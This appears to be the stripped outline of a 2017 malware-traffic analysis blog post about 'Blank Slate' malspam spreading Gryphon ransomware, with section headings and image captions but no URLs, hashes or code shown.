2017-08-02 - "BLANK SLATE" MALSPAM PUSHING GRYPHON RANSOMWARE (A BTCWARE VARIANT)

ASSOCIATED FILES:

SOME BACKGROUND:

TODAY'S NOTES (UPDATED 2017-08-03):

 

EMAILS


Shown above:  Spreadsheet tracker with 4 examples today.

 


Shown above:  One of the attached zip archives and its contents.

 

TRAFFIC


Shown above:  Traffic from an infection filtered in Wireshark.

 

URLS GENERATED BY THE EXTRACTED .JS FILES TO GET THE RANSOMWARE:

 

EMAIL FROM THE DECRYPTION INSTRUCTIONS:

 

SHA256 HASHES

FILE ATTACHMENTS (ZIP ARCHIVES):

 

EXTRACTED .JS FILES:

 

GRYPHON RANSOMWARE SAMPLE:

 

IMAGES


Shown above:  Some encrypted files on a Windows host infected with today's Gryphon sample.

 


Shown above:  Gryphon ransomware decryption instructions.

 

FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.